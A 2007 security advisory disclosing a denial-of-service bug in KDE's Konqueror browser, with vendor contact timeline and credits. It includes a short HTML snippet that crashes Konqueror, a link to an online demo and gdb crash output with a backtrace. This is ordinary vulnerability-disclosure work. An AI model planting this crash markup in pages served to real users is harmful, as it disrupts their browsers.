-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 --------------------------------------------------- | BuHa Security-Advisory #16 | Aug 01st, 2007 | --------------------------------------------------- | Vendor | KDE's Konqueror | | URL | http://www.konqueror.org/ | | Version | <= 3.5.7 | | Risk | Low (Denial Of Service) | --------------------------------------------------- o Description: ============= Konqueror is the file manager for the K Desktop Environment and an Open Source web browser with HTML 4.01 compliance. Visit http://www.konqueror.org/ for detailed information. o Denial of Service: =================== Following HTML code forces Konqueror to crash: > <textarea></button></textarea></br><bdo dir=""> > <pre><frameset> > <a> Online-demo: http://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html > (gdb) set args konqueror.html > (gdb) r > Starting program: /usr/bin/konqueror konqueror.html > (no debugging symbols found) > [...] > [Thread debugging using libthread_db enabled] > [New Thread -1234381104 (LWP 5982)] > (no debugging symbols found) > [...] > Qt: gdb: -nograb added to command-line options. > Use the -dograb option to enforce grabbing. > X Error: BadDevice, invalid or uninitialized input device 169 > Major opcode: 145 > Minor opcode: 3 > Resource id: 0x0 > Failed to open device > X Error: BadDevice, invalid or uninitialized input device 169 > Major opcode: 145 > Minor opcode: 3 > Resource id: 0x0 > Failed to open device > (no debugging symbols found) > [...] > > Program received signal SIGSEGV, Segmentation fault. > [Switching to Thread -1234381104 (LWP 5982)] > 0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so. I sent a mail to KDE's security mailing list [1] and received an answer from Dirk Mueller several days later. He wrote that the HTML code triggers an assert and when commenting out the assert the backtrace ends in: > #6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0) > at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65 > #7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08, > obj=0x0) > at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624 This issue does not seem to be exploitable. o Disclosure Timeline: ===================== 03 May 07 - DoS vulnerability discovered. 07 May 07 - Vendor contacted. 10 May 07 - Vendor confirmed vulnerability. 01 Aug 07 - Public release. o Solution: ========== There is no solution yet. I assume the KDE developers will address this bug in an upcoming KDE release. o Credits: ========= Thomas Waldegger <bugtraq@xxxxxxxxxxxx> BuHa-Security Community - http://buha.info/board/ If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a spam address than a regular mail address therefore it's possible that I ignore some mails. Please use the contact details at http://morph3us.org/ to contact me. Greets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon, Rodnox, trappy and all members of BuHa. Advisory online: http://morph3us.org/advisories/20070801-konqueror-3.57.txt [1] http://www.kde.org/info/security/ - -- Don't you feel the power of CSS Layouts? BuHa-Security Community: https://buha.info/board/ -----BEGIN PGP SIGNATURE----- Version: n/a Comment: http://morph3us.org/ iD8DBQFGsNwHkCo6/ctnOpYRA02bAJ0YjwxUB3PnYf2IKTyT0RkauZmd3QCgir16 WHuq7rPUBPx1/5nx+jJUPDg= =R4ZU -----END PGP SIGNATURE-----
